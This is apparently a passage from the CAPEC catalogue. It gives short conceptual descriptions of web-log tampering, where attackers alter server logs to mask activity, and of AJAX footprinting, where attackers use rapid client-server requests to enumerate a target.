Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to "Log Injection-Tampering-Forging" except that in this case, the attack is targeting the logs of the web server and not the application.
CAPEC-85: AJAX Footprinting
This attack utilizes the frequent client-server roundtrips in Ajax conversation to scan a system. While Ajax does not open up new vulnerabilities per se, it does optimize them from an attacker point of view. A common first step for an attacker is to footprint the target environment to understand what attacks will work. Since footprinting relies on enumeration, the conversational pattern of rapid, multiple requests and responses that are typical in Ajax applications enable an attacker to look for many vulnerabilities, well-known ports, network locations and so on. The knowledge gained through Ajax fingerprinting can be used to support other attacks, such as XSS.